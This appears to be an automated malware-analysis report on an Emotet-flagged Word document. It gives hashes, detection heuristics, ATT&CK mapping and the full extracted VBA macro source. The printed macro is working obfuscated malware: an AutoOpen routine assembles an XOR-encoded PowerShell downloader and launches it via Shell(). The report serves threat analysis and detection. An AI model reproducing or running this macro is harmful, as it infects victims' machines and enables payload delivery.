Office (OLE) malware analysis — malicious · cf34bafbecfbdf4c

MALICIOUS

Office (OLE)

98.0 KB Created: 2018-06-19 22:18:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 73c4676628d1a6b79ec3d272b649c76d SHA-1: c7fa53dc1965a1035ea91d2507b1930ec9f53e8b SHA-256: cf34bafbecfbdf4cfc58eb4379d0c374bc59e08b5cdbabcc2da5790bf9551609

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros with an AutoOpen function that utilizes the Shell() command. This function is designed to construct and execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection also confirms the malicious nature of the file.

Heuristics 7

ClamAV: Doc.Malware.Emotet-6874849-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-6874849-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

cNhWO = 18879
CRZwI = CiYQnwV + Shell(NNoKitKjJ + KQWRPC + sjBXorS, 80292 - 80292)
buloXo = CDate(73894)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11557 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11557 bytes
SHA-256: `65f1e451374506ca9627bd4e612046139005d9e6254319f3281e78e0ad71a2d8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PDZSnjAlWarDk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "dRThTYqLGaQT" Function kUIjAdLmpA() On Error Resume Next GQJVVz = 74633 YvYUJc = CByte(vaimPU) TjmSF = 87736 piWFV = CDate(raEHAv + Sin(33983 + 88957) * 29751 * CInt(74612)) BvONfD = CDate(25906) PbccKT = NHONG WiuPAo = "OwerSHell [Str" + "iNG]::JOin(" + " '' ,(" + "'18C87Y124" + "!70" DHDEzZ = 60773 ZjHjc = CByte(QclcfL) crzQiS = 19551 RIwoVo = CDate(IXXdkn + Sin(99777 + 76294) * 52226 * CInt(13063)) sNadT = CDate(94154) iaDHAq = iqLtca YsSmWaXKvUz = "C67C64!1" + "19a22" + "C11G22r88C83r65" + "-2" + "7G8" + "9{84{92" + "Y83G85G66" + "-22r68Y87" + "r88{8" DHENzu = 45889 EmUvo = CByte(kKIIO) IQCmcF = 64675 CXtnXr = CDate(vDnrf + Sin(19811 + 65654) * 12395 * CInt(13514)) wSOvzw = CDate(15443) isGHm = ZEWol TjioQLQ = "2!89G91a13G18a6" + "5a7" + "0G125{122r66" + "C119C22r11C2" + "2{88r83Y65C" + "27z89W8" jYwzpG = 40139 idQLH = CByte(SEBoPO) NnLzcp = 90983 oticY = CDate(cGvHR + Sin(62092 + 76162) * 16933 * CInt(41678)) jBClC = CDate(90098) YZlVzz = npTawW waPOWDwvVWj = "4W92C" + "83W" + "85G66G22C" + "101{79G69a6" + "6r83!91W24Y12" + "0C83C66r24r97" + "{83-" + "84Y" + "117" + "G90!9" muKLJu = 42983 aKOIiL = CByte(ZZrIu) HArPld = 64183 pjjzk = CDate(qKmoqR + Sin(11332 + 84869) * 30362 * CInt(66246)) FnfkBt = CDate(58851) PCWmY = jBzhGf pLRpQtCtWO = "5G83Y88z" + "66{13z18r95" + "G97a103Y92{125" + "-98r22a" + "11C22" + "!17r94C" + "66{66C70{" + "12G25C25-" + "65" kUIjAdLmpA = WiuPAo + YsSmWaXKvUz + TjioQLQ + waPOWDwvVWj + pLRpQtCtWO End Function Function jSzbDhZE() On Error Resume Next tYaOm = 5210 chNXz = CByte(mrIiR) qjbWc = 5093 pZqHlB = CDate(VdvXl + Sin(66533 + 27033) * 47480 * CInt(35374)) AwkFjf = CDate(21204) jhGVJ = hTijNI JosWDu = "r65z65z2" + "4{9" + "5r66C91z85C9" + "0-" + "95!88" + "z95W85-" + "24C" + "68-67" + "z25z116r" GlwQRN = 24007 fMmXS = CByte(AzELfq) ZECHWV = 198 nJMlW = CDate(MzlpEw + Sin(44023 + 43152) * 77428 * CInt(42654)) nDUqM = CDate(20441) pqjpmX = wMhTi wrwFtahur = "84W" + "3C89Y25W11" + "8W94z66" + "r66-70G12a25-25" + "-65" + "G65z65a24C" + "87a85r85W89r67" BqZDL = 28990 jTnwj = CByte(BWiPB) wfoCzH = 81702 ztPzS = CDate(tnzHm + Sin(51546 + 15266) * 7032 * CInt(25182)) BoJutO = CDate(18436) tUBCYi = rViwM nmkwT = "Y88z66W95G88a" + "81z9" + "0a95W88r83-" + "24z95!88W80z" njKfN = 43979 cafwb = CByte(AZNGr) nzRTvi = 3245 DbwYIw = CDate(oFoqX + Sin(22148 + 21475) * 4406 * CInt(27806)) UYdkX = CDate(64754) DAkavG = vHpWfK jJAuzH = "89Y25" + "!123{" + "1{1" + "21{122r25!118{" + "94a66!66a70W1" + "2{25!25{65W" BFcuk = 42492 fGRJij = CByte(zVHVW) TwsSK = 72008 urHjt = CDate(wfwAVF + Sin(21924 + 53786) * 66703 * CInt(8457)) BHAJvs = CDate(7267) bPPAv = aHYVu wzuiulbA = "65W65W24{85" + "r83G88!66{" + "67G6" + "8{79z90W87{65W2" KapzY = 33974 GzRSZ = CByte(voUcn) kdwTnU = 82456 afBcm = CDate(qTtvm + Sin(31356 + 82930) * 67527 * CInt(47229)) wfhcV = CDate(23400) aqFwW = iiQim sJhos = "4r64Y79!6" + "7a82r67!2" + "4{66" + "Y83z85r94W25" + "!94{8" + "5a122" + "W91C67C2" EWiRiE = 4331 iMwpaZ = CByte(lPQhR) CiVmw = 29519 wSdWs = CDate(ADLoNR + Sin(12584 + 72763) * 92675 * CInt(8157)) XMIOD = CDate(67543) wMKXMD = mYrhK IXkbm = "5Y" + "118!9" + "4-66W" + "66a70a12-25" + "{25Y6Y3{5" jSzbDhZE = JosWDu + wrwFtahur + nmkwT + jJAuzH + wzuiulbA + sJhos + IXkbm End Function Function worEFlZJ() On Error Resume Next aztYCa = 52295 QLObH = CByte(RqYskO) JlpTV = 82968 ivUpjV = CDate(zTmUl + Sin(55292 + 39277) * 42249 * CInt(25817)) jToTt = CDate(79402) FCuloz = LAcqdF StBIwz = "z4Y82{88W87z" + "24" + "!85z89{91" + "z25Y71r110W92z" + "119z25a11" + "8r94z66!66" + "r70{12" + "G25r25r6" + "5W65{65" + "Y24{9" umTRX = 73092 zmlNF = CByte(NquAu) vJEMw = 97894 LAnAAW = CDate(LPaTQ + Sin(22257 + 40977) * 23774 * CInt(27648)) aijsQW = CDate(27062) cXuqSq = ZXQuOu ZcLBpmz = "4a76!81a67r91C" + "83C95C24r88a" + "83C66{25W0Y7" + "-125" + "G79-96{5a25z17Y" NjFCaT = 64148 mFSRBo = CByte(TqsJwa) vJWfw = 8150 INPFP = CDate(oorXHv + Sin(71861 + 20538) * 54192 * CInt(92711)) GKzVXX = CDate(13649) OzpNTp = KkdvF XILwwj = "24W101z70a90r9" + "5G66" + "a30!17z118" + "-17z31z13G1" + "8-89G123" + "r95" vZKfC = 2783 qfrviA = CByte(JaRtoY) TPKsGl = 64628 zYGNXt = CDate(pmKLSD + Sin(19323 + 59582) * 85679 * CInt(65937)) viKti = CDate(73596) EcmjF = HfnAuz jimokjsc = "!94z67!2" + "2G11G22r1" + "8a" + "87C1" + "24G7" + "0!67!64C119G24" + "{88{83" + "Y78G66C3" + "0W7-26Y22{1!1" + "4C1G5Y2G1r31z1" HjTnH = 64594 VEQmc = CByte(dJpOTU) AiqTc = 76050 DsRYHA = CDate(zwSww + Sin(8634 + 71558) * 18620 * CInt(67222)) sFwun = CDate(46480) IXFqFU = nRbSBk mTDFWMfD = "3C18!84" + "r93" + "Y124Y89r127W" + "98W22!11C" fbifNW = 34515 PUiXL = CByte(PSBzYm) BcVFBD = 3745 ORjvs = CDate(waKrwM + Sin(35344 + 3337) * 13962 * CInt(67917)) pYjwLu = CDate(92521) YlkQoV = AGpCu tXifAGvF = "22!" + "18W83{8" + "8{64G12-66r83z9" + "1W70" + "-22" + "!29z22" TJTrqG = 50176 SnRAS = CByte(ILzZvc) PRDjF = 75834 MAEhCF = CDate(RYwPib + Sin(77420 + 3068) * 71256 * CInt(88917)) lntjbp = CDate(42560) OTKGb = ZhhWZ kCinnaRwJ = "a17G106{17W" + "22W29Y22{" + "18z89!" + "123G95{94z6" + "7!22r29" + "-2" + "2r" worEFlZJ = StBIwz + ZcLBpmz + XILwwj + jimokjsc + mTDFWMfD + tXifAGvF + kCinnaRwJ End Function Function RabEFGbjEsA() On Error Resume Next TQhju = 51271 jzTzlI = CByte(KaCjGY) NshXb = 28550 ariOXb = CDate(hnQfA + Sin(52402 + 53136) * 26361 * CInt(69274)) HVYFrM = CDate(67132) RZEqBC = OQLuJa KFjlhu = "17G24G" + "83a78G83z" + "17Y13{80{89{68" + "W83{87a85-9" kKJtP = 30821 YVjHoV = CByte(niIZpj) CCJQc = 53909 tEmVM = CDate(OvwmmX + Sin(81313 + 90647) * 60027 * CInt(75110)) HPGXMN = CDate(34450) FcaOZ = mfYdvD jAWiZ = "4a30z18W90" + "G103" + "G82C122a" + "94C22" + "r95!88r2" + "2{18{95Y" + "97-103Y92G1" SItYi = 22116 CLJLkT = CByte(HlrtT) UqErlD = 34585 jkOaTD = CDate(CwiBf + Sin(27311 + 22516) * 68819 * CInt(38035)) zpoCT = CDate(83649) RKkUu = RWIWV pZcwCbv = "25-98C" + "31z77C66z68r" + "79Y77r18z65{70{" + "12" jshBzL = 5903 OFtQWZ = CByte(JGGoUz) aiLsa = 54779 odIRWf = CDate(djUjN + Sin(53609 + 15205) * 5248 * CInt(54738)) KjvZc = CDate(84044) HuGvk = OzzfhA UJfLvtZ = "5C122-66Y1" + "19Y24z" + "114Y89a65" + "C88r90{89-8" wztLfX = 73133 GVvIE = CByte(SilBDw) CtsDE = 73251 Cjhar = CDate(HAuQM + Sin(86118 + 17569) * 82889 * CInt(58575)) TXArcd = CDate(87930) ZwPIAZ = Wiqibt LcEqDVVEk = "7a" + "82Y112r95Y9" + "0r83{30-18G90" + "r103r82-1" + "22r94" + "{24r98C8" + "9z101{66G6" hNjKh = 83169 qFlcsQ = CByte(jOlAc) FiaRX = 45771 SAFms = CDate(sjjwS + Sin(66313 + 12207) * 61891 * CInt(47552)) KwAdjG = CDate(49744) BjcDW = HDcuDl HhihN = "8a9" + "5r88r81" + "{30-31-26W22G1" + "8-84!" + "93C124!" + "89!127-98Y31" + "Y13Y" + "101W66z87{68Y" + "66" + "W27r102r68G89Y" jqAvZ = 95427 nhtliX = CByte(bziWrn) iSbIS = 79591 sRiIT = CDate(KihiY + Sin(93859 + 38403) * 41905 * CInt(66675)) BJzRGW = CDate(50263) ZOSih = ujkLij nlOZFNbXE = "85z83z69a69W22" + "z18W8" + "4r93C124C89{" + "127Y98a13C84!6" + "8G83a8" + "7G93r" RabEFGbjEsA = KFjlhu + jAWiZ + pZcwCbv + UJfLvtZ + LcEqDVVEk + HhihN + nlOZFNbXE End Function Function JwjCHNVl() On Error Resume Next CWDVQO = 93897 SqZjbo = CByte(rEvnvW) amithV = 4495 zoBjF = CDate(DKwNS + Sin(99733 + 4461) * 27165 * CInt(87484)) YIvij = CDate(6104) wFNlbX = ftGBz QaLUBzcOjH = "13W75Y85-87" + "r66!85G94r77-6" + "5Y68{" + "95-66z83a27W94" + "G89r69Y" + "66-22W1" + "8-105r24!1" + "15W78G85W83G70" zVipj = 14498 UvTniW = CByte(YSRkZb) RlGkpw = 90376 kGVsrN = CDate(kiwuPi + Sin(21312 + 96547) * 73847 * CInt(25723)) mzFFP = CDate(43095) ZdNPc = vaCNVd ZNflptzAGjN = "{66!95z89{88W24" + "{12" + "3G83Y69C69!8" + "7C" + "81Y83G1" + "3z75C75'" IwonUp = 19748 KoNrlq = CByte(OUdXzQ) amHNf = 48908 bInSf = CDate(fYbHH + Sin(71635 + 56221) * 85380 * CInt(47591)) lOBMc = CDate(58733) lzbss = LazWz UMbXbYwV = ".s" + "pLiT('YGr!" + "WaC-{" + "z'" + ")\|" + " %" fZZGZN = 80106 WQLnSM = CByte(PPBmf) urDWW = 12284 pzuFDI = CDate(iMrBiC + Sin(42198 + 79393) * 19417 * CInt(72943)) zMUIT = CDate(36073) fzUWsL = uXiNEz MduqzBcsHi = "{ [cHa" + "R] (" + "$_" + " -bXOR 0x36 )" + "}) " + ")\| . ( $vErBOsE" + "PrEFereNCE.ToS" + "triN" + "G()[1,3]+'X'" JTXDXz = 15225 pHCiZo = CByte(dTHiM) wcEYR = 45469 LSSnfz = CDate(fzSVL + Sin(71974 + 34063) * 64425 * CInt(50863)) lKVHu = CDate(91541) WXSbN = PouZXI EnIqJ = "-JO" + "IN'')" JwjCHNVl = QaLUBzcOjH + ZNflptzAGjN + UMbXbYwV + MduqzBcsHi + EnIqJ End Function Function wrUWbToQ() On Error Resume Next hRrdwF = CDate(21195) Zbthz = DrKizH QRzUQk = 57639 PNruwP = CByte(YdSQz) jwjUAf = CDate(wfYwG + Sin(68947 + 3105) * 11048 * CInt(81928)) RfSHjR = 19942 zBqoHQ = CDate(75309) BBCzSj = ImOjJm wkQawu = 37607 qjMBDY = CByte(REjwdc) Sojzbr = CDate(HzDkAT + Sin(3720 + 76270) * 12147 * CInt(74700)) EONXV = 7926 SEOYp = CDate(32059) IYnSnv = VCfiZ mozkvt = 53682 vOkBO = CByte(laSVz) vFoPli = CDate(ONFPXn + Sin(42221 + 74630) * 83548 * CInt(1036)) uiMjQ = 13726 jPjoj = CDate(39662) zNmSD = NkjmEU zSTAYU = 6032 LffMOZ = CByte(stcRtN) bpWkCz = CDate(EnuTrD + Sin(19550 + 42650) * 99490 * CInt(42058)) niFkqI = 54843 SPCAT = CDate(21355) JGGbzb = kGtKp ZsnFh = 97251 KFKPK = CByte(hGHImY) JwZfqt = CDate(ZVwNVz + Sin(24491 + 49985) * 59354 * CInt(53929)) mWSrLf = 58546 End Function Function wDwXICEjtS() On Error Resume Next cGnFPf = CDate(20745) ZPbcS = JKhCSd QiHlJ = 91484 YJska = CByte(JEZhA) wjUOzz = CDate(scwpo + Sin(61842 + 75103) * 22876 * CInt(93445)) sFwUS = 84553 DaRzdQCJJhl = MwPhP + Chr(mnsSj + 80 + IiZXAaXF) SvwPD = CDate(11805) UCpOWl = dZShB dlczQc = 51489 MRouqE = CByte(QjwjmK) qLUTHX = CDate(mdLpSR + Sin(96692 + 29279) * 25824 * CInt(47161)) ZUIVG = 38677 iwVEc = CDate(20189) AdZqQ = tRkLE ijBiGm = 82795 sFDhX = CByte(iDucoj) wJcIt = CDate(EnALIk + Sin(89550 + 71127) * 70923 * CInt(37574)) jadbaV = 67484 wDwXICEjtS = zJMfwjnfc + DaRzdQCJJhl + kUIjAdLmpA + jSzbDhZE + worEFlZJ + RabEFGbjEsA + JwjCHNVl jqImzF = CDate(38504) LEaViq = omtDf uoZXvD = 68060 Eodti = CByte(Ezlah) fITPBq = CDate(LDBuN + Sin(58264 + 49653) * 25487 * CInt(92634)) Xqjwow = 40120 End Function Function FBsrdCR(KQWRPC) On Error Resume Next OwRfQd = CDate(9229) hjppi = iBncrT roksv = 68515 URJdMF = CByte(BtPART) flRbSU = CDate(pciGV + Sin(38413 + 40529) * 70211 * CInt(50157)) iFaql = 46481 mZfrXW = CDate(29966) ijcBvL = CoaZL kmUlD = 74172 KzHtL = CByte(LjuPow) BvdjM = CDate(ivPDm + Sin(93058 + 40869) * 37236 * CInt(7623)) cNhWO = 18879 CRZwI = CiYQnwV + Shell(NNoKitKjJ + KQWRPC + sjBXorS, 80292 - 80292) buloXo = CDate(73894) pHUVm = FUSBQ dKzdd = 75643 MBAcTV = CByte(IruOIp) FZHJBC = CDate(jwYIj + Sin(97039 + 1034) * 77580 * CInt(96110)) pFwsV = 93370 End Function Sub AutoOpen() On Error Resume Next pjBHS = CDate(17027) KZHYRa = iKTUl VKUwkL = 92226 AImbFn = CByte(hhSUSQ) JocDN = CDate(vVLjKq + Sin(36190 + 9533) * 22593 * CInt(61558)) csnXqU = 18471 Application.Run pzPvkRNAN + "FBsrdCR" + ZYYzisfE, OftsVIF + wDwXICEjtS + bOfph ZCIbkQ = CDate(12485) rhUfz = dwGizq sLmMV = 67323 bzwdD = CByte(ztBusN) DvOrW = CDate(ROVLv + Sin(83026 + 83328) * 5509 * CInt(24581)) LcFcs = 45445 End Sub

SHA-256: 65f1e451374506ca9627bd4e612046139005d9e6254319f3281e78e0ad71a2d8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PDZSnjAlWarDk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dRThTYqLGaQT"
Function kUIjAdLmpA()
On Error Resume Next
GQJVVz = 74633
YvYUJc = CByte(vaimPU)
TjmSF = 87736
piWFV = CDate(raEHAv + Sin(33983 + 88957) * 29751 * CInt(74612))
BvONfD = CDate(25906)
PbccKT = NHONG
WiuPAo = "OwerSHell  [Str" + "iNG]::JOin(" + " '' ,(" + "'18C87Y124" + "!70"
DHDEzZ = 60773
ZjHjc = CByte(QclcfL)
crzQiS = 19551
RIwoVo = CDate(IXXdkn + Sin(99777 + 76294) * 52226 * CInt(13063))
sNadT = CDate(94154)
iaDHAq = iqLtca
YsSmWaXKvUz = "C67C64!1" + "19a22" + "C11G22r88C83r65" + "-2" + "7G8" + "9{84{92" + "Y83G85G66" + "-22r68Y87" + "r88{8"
DHENzu = 45889
EmUvo = CByte(kKIIO)
IQCmcF = 64675
CXtnXr = CDate(vDnrf + Sin(19811 + 65654) * 12395 * CInt(13514))
wSOvzw = CDate(15443)
isGHm = ZEWol
TjioQLQ = "2!89G91a13G18a6" + "5a7" + "0G125{122r66" + "C119C22r11C2" + "2{88r83Y65C" + "27z89W8"
jYwzpG = 40139
idQLH = CByte(SEBoPO)
NnLzcp = 90983
oticY = CDate(cGvHR + Sin(62092 + 76162) * 16933 * CInt(41678))
jBClC = CDate(90098)
YZlVzz = npTawW
waPOWDwvVWj = "4W92C" + "83W" + "85G66G22C" + "101{79G69a6" + "6r83!91W24Y12" + "0C83C66r24r97" + "{83-" + "84Y" + "117" + "G90!9"
muKLJu = 42983
aKOIiL = CByte(ZZrIu)
HArPld = 64183
pjjzk = CDate(qKmoqR + Sin(11332 + 84869) * 30362 * CInt(66246))
FnfkBt = CDate(58851)
PCWmY = jBzhGf
pLRpQtCtWO = "5G83Y88z" + "66{13z18r95" + "G97a103Y92{125" + "-98r22a" + "11C22" + "!17r94C" + "66{66C70{" + "12G25C25-" + "65"
kUIjAdLmpA = WiuPAo + YsSmWaXKvUz + TjioQLQ + waPOWDwvVWj + pLRpQtCtWO
End Function
Function jSzbDhZE()
On Error Resume Next
tYaOm = 5210
chNXz = CByte(mrIiR)
qjbWc = 5093
pZqHlB = CDate(VdvXl + Sin(66533 + 27033) * 47480 * CInt(35374))
AwkFjf = CDate(21204)
jhGVJ = hTijNI
JosWDu = "r65z65z2" + "4{9" + "5r66C91z85C9" + "0-" + "95!88" + "z95W85-" + "24C" + "68-67" + "z25z116r"
GlwQRN = 24007
fMmXS = CByte(AzELfq)
ZECHWV = 198
nJMlW = CDate(MzlpEw + Sin(44023 + 43152) * 77428 * CInt(42654))
nDUqM = CDate(20441)
pqjpmX = wMhTi
wrwFtahur = "84W" + "3C89Y25W11" + "8W94z66" + "r66-70G12a25-25" + "-65" + "G65z65a24C" + "87a85r85W89r67"
BqZDL = 28990
jTnwj = CByte(BWiPB)
wfoCzH = 81702
ztPzS = CDate(tnzHm + Sin(51546 + 15266) * 7032 * CInt(25182))
BoJutO = CDate(18436)
tUBCYi = rViwM
nmkwT = "Y88z66W95G88a" + "81z9" + "0a95W88r83-" + "24z95!88W80z"
njKfN = 43979
cafwb = CByte(AZNGr)
nzRTvi = 3245
DbwYIw = CDate(oFoqX + Sin(22148 + 21475) * 4406 * CInt(27806))
UYdkX = CDate(64754)
DAkavG = vHpWfK
jJAuzH = "89Y25" + "!123{" + "1{1" + "21{122r25!118{" + "94a66!66a70W1" + "2{25!25{65W"
BFcuk = 42492
fGRJij = CByte(zVHVW)
TwsSK = 72008
urHjt = CDate(wfwAVF + Sin(21924 + 53786) * 66703 * CInt(8457))
BHAJvs = CDate(7267)
bPPAv = aHYVu
wzuiulbA = "65W65W24{85" + "r83G88!66{" + "67G6" + "8{79z90W87{65W2"
KapzY = 33974
GzRSZ = CByte(voUcn)
kdwTnU = 82456
afBcm = CDate(qTtvm + Sin(31356 + 82930) * 67527 * CInt(47229))
wfhcV = CDate(23400)
aqFwW = iiQim
sJhos = "4r64Y79!6" + "7a82r67!2" + "4{66" + "Y83z85r94W25" + "!94{8" + "5a122" + "W91C67C2"
EWiRiE = 4331
iMwpaZ = CByte(lPQhR)
CiVmw = 29519
wSdWs = CDate(ADLoNR + Sin(12584 + 72763) * 92675 * CInt(8157))
XMIOD = CDate(67543)
wMKXMD = mYrhK
IXkbm = "5Y" + "118!9" + "4-66W" + "66a70a12-25" + "{25Y6Y3{5"
jSzbDhZE = JosWDu + wrwFtahur + nmkwT + jJAuzH + wzuiulbA + sJhos + IXkbm
End Function
Function worEFlZJ()
On Error Resume Next
aztYCa = 52295
QLObH = CByte(RqYskO)
JlpTV = 82968
ivUpjV = CDate(zTmUl + Sin(55292 + 39277) * 42249 * CInt(25817))
jToTt = CDate(79402)
FCuloz = LAcqdF
StBIwz = "z4Y82{88W87z" + "24" + "!85z89{91" + "z25Y71r110W92z" + "119z25a11" + "8r94z66!66" + "r70{12" + "G25r25r6" + "5W65{65" + "Y24{9"
umTRX = 73092
zmlNF = CByte(NquAu)
vJEMw = 97894
LAnAAW = CDate(LPaTQ + Sin(22257 + 40977) * 23774 * CInt(27648))
aijsQW = CDate(27062)
cXuqSq = ZXQuOu
ZcLBpmz = "4a76!81a67r91C" + "83C95C24r88a" + "83C66{25W0Y7" + "-125" + "G79-96{5a25z17Y"
NjFCaT = 64148
mFSRBo = CByte(TqsJwa)
vJWfw = 8150
INPFP = CDate(oorXHv + Sin(71861 + 20538) * 54192 * CInt(92711))
GKzVXX = CDate(13649)
OzpNTp = KkdvF
XILwwj = "24W101z70a90r9" + "5G66" + "a30!17z118" + "-17z31z13G1" + "8-89G123" + "r95"
vZKfC = 2783
qfrviA = CByte(JaRtoY)
TPKsGl = 64628
zYGNXt = CDate(pmKLSD + Sin(19323 + 59582) * 85679 * CInt(65937))
viKti = CDate(73596)
EcmjF = HfnAuz
jimokjsc = "!94z67!2" + "2G11G22r1" + "8a" + "87C1" + "24G7" + "0!67!64C119G24" + "{88{83" + "Y78G66C3" + "0W7-26Y22{1!1" + "4C1G5Y2G1r31z1"
HjTnH = 64594
VEQmc = CByte(dJpOTU)
AiqTc = 76050
DsRYHA = CDate(zwSww + Sin(8634 + 71558) * 18620 * CInt(67222))
sFwun = CDate(46480)
IXFqFU = nRbSBk
mTDFWMfD = "3C18!84" + "r93" + "Y124Y89r127W" + "98W22!11C"
fbifNW = 34515
PUiXL = CByte(PSBzYm)
BcVFBD = 3745
ORjvs = CDate(waKrwM + Sin(35344 + 3337) * 13962 * CInt(67917))
pYjwLu = CDate(92521)
YlkQoV = AGpCu
tXifAGvF = "22!" + "18W83{8" + "8{64G12-66r83z9" + "1W70" + "-22" + "!29z22"
TJTrqG = 50176
SnRAS = CByte(ILzZvc)
PRDjF = 75834
MAEhCF = CDate(RYwPib + Sin(77420 + 3068) * 71256 * CInt(88917))
lntjbp = CDate(42560)
OTKGb = ZhhWZ
kCinnaRwJ = "a17G106{17W" + "22W29Y22{" + "18z89!" + "123G95{94z6" + "7!22r29" + "-2" + "2r"
worEFlZJ = StBIwz + ZcLBpmz + XILwwj + jimokjsc + mTDFWMfD + tXifAGvF + kCinnaRwJ
End Function
Function RabEFGbjEsA()
On Error Resume Next
TQhju = 51271
jzTzlI = CByte(KaCjGY)
NshXb = 28550
ariOXb = CDate(hnQfA + Sin(52402 + 53136) * 26361 * CInt(69274))
HVYFrM = CDate(67132)
RZEqBC = OQLuJa
KFjlhu = "17G24G" + "83a78G83z" + "17Y13{80{89{68" + "W83{87a85-9"
kKJtP = 30821
YVjHoV = CByte(niIZpj)
CCJQc = 53909
tEmVM = CDate(OvwmmX + Sin(81313 + 90647) * 60027 * CInt(75110))
HPGXMN = CDate(34450)
FcaOZ = mfYdvD
jAWiZ = "4a30z18W90" + "G103" + "G82C122a" + "94C22" + "r95!88r2" + "2{18{95Y" + "97-103Y92G1"
SItYi = 22116
CLJLkT = CByte(HlrtT)
UqErlD = 34585
jkOaTD = CDate(CwiBf + Sin(27311 + 22516) * 68819 * CInt(38035))
zpoCT = CDate(83649)
RKkUu = RWIWV
pZcwCbv = "25-98C" + "31z77C66z68r" + "79Y77r18z65{70{" + "12"
jshBzL = 5903
OFtQWZ = CByte(JGGoUz)
aiLsa = 54779
odIRWf = CDate(djUjN + Sin(53609 + 15205) * 5248 * CInt(54738))
KjvZc = CDate(84044)
HuGvk = OzzfhA
UJfLvtZ = "5C122-66Y1" + "19Y24z" + "114Y89a65" + "C88r90{89-8"
wztLfX = 73133
GVvIE = CByte(SilBDw)
CtsDE = 73251
Cjhar = CDate(HAuQM + Sin(86118 + 17569) * 82889 * CInt(58575))
TXArcd = CDate(87930)
ZwPIAZ = Wiqibt
LcEqDVVEk = "7a" + "82Y112r95Y9" + "0r83{30-18G90" + "r103r82-1" + "22r94" + "{24r98C8" + "9z101{66G6"
hNjKh = 83169
qFlcsQ = CByte(jOlAc)
FiaRX = 45771
SAFms = CDate(sjjwS + Sin(66313 + 12207) * 61891 * CInt(47552))
KwAdjG = CDate(49744)
BjcDW = HDcuDl
HhihN = "8a9" + "5r88r81" + "{30-31-26W22G1" + "8-84!" + "93C124!" + "89!127-98Y31" + "Y13Y" + "101W66z87{68Y" + "66" + "W27r102r68G89Y"
jqAvZ = 95427
nhtliX = CByte(bziWrn)
iSbIS = 79591
sRiIT = CDate(KihiY + Sin(93859 + 38403) * 41905 * CInt(66675))
BJzRGW = CDate(50263)
ZOSih = ujkLij
nlOZFNbXE = "85z83z69a69W22" + "z18W8" + "4r93C124C89{" + "127Y98a13C84!6" + "8G83a8" + "7G93r"
RabEFGbjEsA = KFjlhu + jAWiZ + pZcwCbv + UJfLvtZ + LcEqDVVEk + HhihN + nlOZFNbXE
End Function
Function JwjCHNVl()
On Error Resume Next
CWDVQO = 93897
SqZjbo = CByte(rEvnvW)
amithV = 4495
zoBjF = CDate(DKwNS + Sin(99733 + 4461) * 27165 * CInt(87484))
YIvij = CDate(6104)
wFNlbX = ftGBz
QaLUBzcOjH = "13W75Y85-87" + "r66!85G94r77-6" + "5Y68{" + "95-66z83a27W94" + "G89r69Y" + "66-22W1" + "8-105r24!1" + "15W78G85W83G70"
zVipj = 14498
UvTniW = CByte(YSRkZb)
RlGkpw = 90376
kGVsrN = CDate(kiwuPi + Sin(21312 + 96547) * 73847 * CInt(25723))
mzFFP = CDate(43095)
ZdNPc = vaCNVd
ZNflptzAGjN = "{66!95z89{88W24" + "{12" + "3G83Y69C69!8" + "7C" + "81Y83G1" + "3z75C75'"
IwonUp = 19748
KoNrlq = CByte(OUdXzQ)
amHNf = 48908
bInSf = CDate(fYbHH + Sin(71635 + 56221) * 85380 * CInt(47591))
lOBMc = CDate(58733)
lzbss = LazWz
UMbXbYwV = ".s" + "pLiT('YGr!" + "WaC-{" + "z'" + ")|" + " %"
fZZGZN = 80106
WQLnSM = CByte(PPBmf)
urDWW = 12284
pzuFDI = CDate(iMrBiC + Sin(42198 + 79393) * 19417 * CInt(72943))
zMUIT = CDate(36073)
fzUWsL = uXiNEz
MduqzBcsHi = "{ [cHa" + "R] (" + "$_" + " -bXOR 0x36  )" + "}) " + ")| . ( $vErBOsE" + "PrEFereNCE.ToS" + "triN" + "G()[1,3]+'X'"
JTXDXz = 15225
pHCiZo = CByte(dTHiM)
wcEYR = 45469
LSSnfz = CDate(fzSVL + Sin(71974 + 34063) * 64425 * CInt(50863))
lKVHu = CDate(91541)
WXSbN = PouZXI
EnIqJ = "-JO" + "IN'')"
JwjCHNVl = QaLUBzcOjH + ZNflptzAGjN + UMbXbYwV + MduqzBcsHi + EnIqJ
End Function

Function wrUWbToQ()
On Error Resume Next
hRrdwF = CDate(21195)
Zbthz = DrKizH
QRzUQk = 57639
PNruwP = CByte(YdSQz)
jwjUAf = CDate(wfYwG + Sin(68947 + 3105) * 11048 * CInt(81928))
